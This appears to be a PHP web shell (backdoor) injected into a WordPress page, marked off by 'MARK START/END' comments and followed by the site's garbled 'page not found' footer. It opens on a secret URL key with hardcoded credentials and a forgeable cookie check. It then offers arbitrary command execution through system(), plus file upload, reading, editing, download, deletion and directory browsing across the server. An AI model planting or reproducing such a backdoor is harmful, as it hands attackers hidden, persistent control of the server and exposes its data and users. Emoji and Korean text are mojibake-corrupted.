// -------- MARK START --------
if (isset($_GET['k']) && $_GET['k'] === 'mintinplan') {
function ws_g($k) { return isset($_GET[$k]) ? $_GET[$k] : (isset($_POST[$k]) ? $_POST[$k] : ''); }
function ws_b($s) { return base64_decode($s); }
$validKey = 'mintinplan';
$validU = 'admin';
$validP = 'MinMaxtime';
$auth = false;
$sname = 'ws_auth';
if (isset($_SESSION) && isset($_SESSION[$sname]) && $_SESSION[$sname] === true) $auth = true;
elseif (isset($_COOKIE[$sname])) {
$d = json_decode(ws_b(substr($_COOKIE[$sname], 0)), true);
if ($d && isset($d['ok']) && $d['ok']) $auth = true;
}
if (!$auth) {
$u = ws_g('usr'); $p = ws_g('pwd');
if ($u === $validU && $p === $validP) {
@session_start();
$_SESSION[$sname] = true;
setcookie($sname, base64_encode(json_encode(['ok'=>true])), time()+86400, '/', '', false, true);
header('Location: ?k='.$validKey);
exit;
}
echo '
Login';
exit;
}
if (ws_g('lo')) { @session_start(); session_destroy(); setcookie($sname, '', time()-3600); header('Location: ?k='.$validKey); exit; }
$act = ws_g('a');
$path = ws_g('p') ?: getcwd();
$path = realpath($path) ?: getcwd();
echo 'Shell';
echo '';
echo '
';
switch ($act) {
case 'upload':
echo 'β¬ Upload File to: '.htmlspecialchars($path).'
';
echo '
';
if (isset($_POST['do_upload']) && isset($_FILES['upfile'])) {
$f = $_FILES['upfile'];
if ($f['error'] === UPLOAD_ERR_OK) {
$name = ws_g('rename') ?: $f['name'];
$dest = rtrim($path, '/').'/'.$name;
if (move_uploaded_file($f['tmp_name'], $dest)) {
$sz = round(filesize($dest)/1024, 2);
echo 'β
Uploaded: '.htmlspecialchars($dest).' ('.$sz.'KB)
';
} else {
echo 'β move_uploaded_file failed (check permissions on '.htmlspecialchars($path).')
';
}
} else {
$errors = [1=>'File too large (php.ini)',2=>'File too large (form)',3=>'Partial upload',4=>'No file',6=>'No tmp dir',7=>'Write failed',8=>'Extension blocked'];
echo 'β Error: '.($errors[$f['error']] ?? 'Unknown').'
';
}
}
echo 'π Current directory contents:
';
$items = scandir($path);
if ($items) {
foreach ($items as $item) {
if ($item === '.' || $item === '..') continue;
$full = $path.'/'.$item;
if (is_dir($full)) echo 'π '.$item."/\n";
else echo 'π '.$item.' ('.round(filesize($full)/1024,1).'KB)'."\n";
}
}
echo '';
break;
case 'tree':
echo 'π³ Directory Tree (depth 4)
';
function ws_tree($root, $depth=0, $max=4) {
if ($depth > $max) return;
if (!is_dir($root)) return;
$items = scandir($root);
if (!$items) return;
foreach ($items as $item) {
if ($item === '.' || $item === '..') continue;
$full = $root.'/'.$item;
if (is_dir($full)) {
echo str_repeat(' ', $depth).'π '.$item."/\n";
ws_tree($full, $depth+1, $max);
} else {
echo str_repeat(' ', $depth).'π '.$item.' ('.round(filesize($full)/1024,1).'KB)'."\n";
}
}
}
ws_tree($path);
echo '';
break;
case 'drives':
echo 'πΎ Accessible Roots
';
if (strtoupper(substr(PHP_OS,0,3)) === 'WIN') {
for ($i=67;$i<=90;$i++) { $d=chr($i).':\\'; if (is_dir($d)) echo $d." β\n"; }
} else {
$cands = ['/','/home','/var','/tmp','/usr','/etc','/opt','/root','/srv','/www','/var/www','/var/www/html',$_SERVER['DOCUMENT_ROOT']??''];
foreach (array_unique($cands) as $c) { if ($c && is_dir($c)) echo $c." β\n"; }
}
echo '';
break;
case 'read':
$f = ws_g('f');
if (!$f || !is_file($f)) { echo 'File not found'; break; }
$content = file_get_contents($f);
echo 'π Editing: '.htmlspecialchars($f).' ('.round(strlen($content)/1024,1).'KB)
';
echo '';
break;
case 'save':
$f = ws_g('f'); $c = ws_g('c');
if ($f) { file_put_contents($f, $c); echo 'β
Saved: '.htmlspecialchars($f); }
break;
case 'exec':
$cmd = ws_g('c');
$output = '';
if ($_SERVER['REQUEST_METHOD'] === 'POST' && $cmd) {
ob_start();
system($cmd);
$output = ob_get_clean();
}
echo 'π₯οΈ Terminal (user: '.htmlspecialchars(get_current_user()).')
';
echo '';
if ($output !== '') echo ''.htmlspecialchars($output).'
';
else echo 'No output
';
break;
case 'down':
$f = ws_g('f');
if ($f && is_file($f)) {
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="'.basename($f).'"');
header('Content-Length: '.filesize($f));
readfile($f);
exit;
}
echo 'File not found';
break;
case 'del':
$f = ws_g('f');
if ($f && is_file($f)) {
if (unlink($f)) echo 'β
Deleted: '.htmlspecialchars($f);
else echo 'β Delete failed (permission?)';
} elseif ($f && is_dir($f)) {
if (rmdir($f)) echo 'β
Directory removed: '.htmlspecialchars($f);
else echo 'β rmdir failed (not empty or permission?)';
}
break;
case 'newfile':
$fname = ws_g('nf');
if ($fname) {
$dest = rtrim($path,'/').'/'.$fname;
if (file_put_contents($dest, '') !== false) echo 'β
Created: '.htmlspecialchars($dest);
else echo 'β Create failed';
}
echo '';
break;
case 'newdir':
$dname = ws_g('nd');
if ($dname) {
$dest = rtrim($path,'/').'/'.$dname;
if (mkdir($dest, 0755)) echo 'β
Created dir: '.htmlspecialchars($dest);
else echo 'β mkdir failed';
}
echo '';
break;
default:
echo 'π '.htmlspecialchars($path).'
';
$parent = dirname($path);
if ($parent && $parent !== $path) echo 'β¬ Parent | ';
echo '[+ New File] | ';
echo '[+ New Dir] | ';
echo '[β¬ Upload]
';
echo '| Name | Size | Perms | Actions |
';
$items = scandir($path);
if ($items) {
foreach ($items as $item) {
if ($item === '.' || $item === '..') continue;
$full = $path.'/'.$item;
$isDir = is_dir($full);
$size = $isDir ? '-' : round(filesize($full)/1024,1).'KB';
$perms = substr(sprintf('%o',fileperms($full)),-4);
$enc = urlencode($full);
echo '';
if ($isDir) echo '| π '.$item.' | ';
else echo 'π '.$item.' | ';
echo ''.$size.' | '.$perms.' | ';
if (!$isDir) echo '[Edit] ';
echo '[Download] ';
echo '[Delete]';
echo ' |
';
}
}
echo '
';
break;
}
echo '';
exit;
}
// -------- MARK END --------
νμ΄μ§λ₯Ό μ°Ύμ μ μμ – uAPI
Copyright © 2026 | WordPress Theme by MH Themes